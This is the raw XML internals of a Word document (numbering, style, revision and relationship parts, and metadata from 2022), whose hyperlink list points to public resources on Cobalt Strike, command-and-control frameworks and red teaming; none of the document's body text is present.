    <w:tmpl w:val="20BE5C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26FF49E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE40F44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8BA2E3A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A088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3062D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A1E5B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3555227"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D18EEE2E"/>
    <w:lvl w:ilvl="0" w:tplc="1D48B75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723286"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="059C6A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98B2320"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="540E11CC"/>
    <w:lvl w:ilvl="0" w:tplc="9ABCB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B21D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="632E61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243D4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD506A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4730304"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3E234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C0336FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76F06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6374B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F23682F0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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1D75163"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="067056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3963214"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF6AF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6150ABB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A624538"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="678" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="924" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1386" w:hanging="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1488" w:hanging="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1950" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2052" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2514" w:hanging="1800"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2976" w:hanging="2160"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="757D1D21"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="745ED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BD03C96"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1632CF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61627608">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="77287135">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="348259747">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2003120064">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="290210632">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="691221164">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="573392020">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="292443135">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="294943793">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1538615588">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="809321086">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1811094787">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1299798809">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1650938002">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1584099632">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="825634229">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="359084581">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="219286665">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1327590218">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1593204512">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1132868529">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="114755427">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="904486846">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="285089669">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1129906300">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="366412633">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="2113084184">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="50405357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Сергей Зотов">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="8d4a999a4b37a7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235"/>
    <w:rsid w:val="00095A49"/>
    <w:rsid w:val="000A0047"/>
    <w:rsid w:val="000A4BEC"/>
    <w:rsid w:val="000F3D15"/>
    <w:rsid w:val="00147B10"/>
    <w:rsid w:val="0015565F"/>
    <w:rsid w:val="00164B39"/>
    <w:rsid w:val="0016524B"/>
    <w:rsid w:val="001661D9"/>
    <w:rsid w:val="00212BCD"/>
    <w:rsid w:val="0023039A"/>
    <w:rsid w:val="00240DA7"/>
    <w:rsid w:val="00266DC4"/>
    <w:rsid w:val="00285DFD"/>
    <w:rsid w:val="00287687"/>
    <w:rsid w:val="002948FA"/>
    <w:rsid w:val="002A3235"/>
    <w:rsid w:val="00332602"/>
    <w:rsid w:val="00375B3D"/>
    <w:rsid w:val="003F5014"/>
    <w:rsid w:val="00436628"/>
    <w:rsid w:val="00483213"/>
    <w:rsid w:val="00483920"/>
    <w:rsid w:val="00567E50"/>
    <w:rsid w:val="0059733A"/>
    <w:rsid w:val="00661BA8"/>
    <w:rsid w:val="0067009A"/>
    <w:rsid w:val="006F64C1"/>
    <w:rsid w:val="00771D59"/>
    <w:rsid w:val="007D31F5"/>
    <w:rsid w:val="007F03E4"/>
    <w:rsid w:val="00840AF7"/>
    <w:rsid w:val="00872B4F"/>
    <w:rsid w:val="00881508"/>
    <w:rsid w:val="008E7005"/>
    <w:rsid w:val="008F5C28"/>
    <w:rsid w:val="009228F2"/>
    <w:rsid w:val="00960DF9"/>
    <w:rsid w:val="009F031A"/>
    <w:rsid w:val="00A0519F"/>
    <w:rsid w:val="00B13C91"/>
    <w:rsid w:val="00B22CF1"/>
    <w:rsid w:val="00B2520C"/>
    <w:rsid w:val="00B41F73"/>
    <w:rsid w:val="00B75050"/>
    <w:rsid w:val="00BB644C"/>
    <w:rsid w:val="00D91D23"/>
    <w:rsid w:val="00DB04FF"/>
    <w:rsid w:val="00DC4343"/>
    <w:rsid w:val="00DC6494"/>
    <w:rsid w:val="00E34E90"/>
    <w:rsid w:val="00E91CA4"/>
    <w:rsid w:val="00EA4BF1"/>
    <w:rsid w:val="00EB328D"/>
    <w:rsid w:val="00EE7791"/>
    <w:rsid w:val="00F24247"/>
    <w:rsid w:val="00F67AAB"/>
    <w:rsid w:val="00FB663C"/>
    <w:rsid w:val="00FC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7E3D2"/>
  <w15:docId w15:val="{E15F8C8E-1E73-44DF-967A-93FFA7DF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TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008F5C28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F5C28"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F5C28"/>
    <w:pPr>
      <w:spacing w:after="10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8F5C28"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E7005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8E7005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8E7005"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E7005"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af0">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="000A0047"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="af1">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00332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unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding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techtarget.com/searchsecurity/feature/Command-and-control-servers-The-puppet-masters-that-govern-malware" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi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makeuseof.com/cobalt-strike-explanation-and-uses/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zer0yu/Awesome-CobaltStrike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hyperlink" Target="https://habr.com/ru/company/varonis/blog/524308/?ysclid=l55ad5omnm14028130" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://habr.com/ru/post/351592/?ysclid=l56nlejv2b348182192" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnews.ru/news/top/2019-12-03_opublikovan_rejting_cnews_security" TargetMode="External"/><Relationship Id="rId40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anti-malware.ru/analytics/Market_Analysis/Red-Team-Operations-market-overview" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/FunnyWolf/Viper" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ptsecurity.com/ru-ru/research/analytics/regional-information-security-2018/#id3" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2011/relationships/commentsExtended" Target="commentsExtended.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://habr.com/ru/company/varonis/blog/528578/?ysclid=l53i08yuj7541448789" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://habr.com/ru/company/ruvds/blog/672410/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hyperlink" Target="https://habr.com/ru/company/varonis/blog/559512/?ysclid=l53s9v8y5f882730081" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/yeyintminthuhtut/Awesome-Red-Teaming" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0011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blogs.cisco.com/security/can-your-organisation-be-breached-find-out-with-a-red-team" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EmpireProject/Empire?ysclid=l56nlgi6x3278929696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A9308-7E2F-453C-8586-AA8375952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36</Pages>
  <Words>7651</Words>
  <Characters>43616</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>363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Fox</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-03T17:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-04T11:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>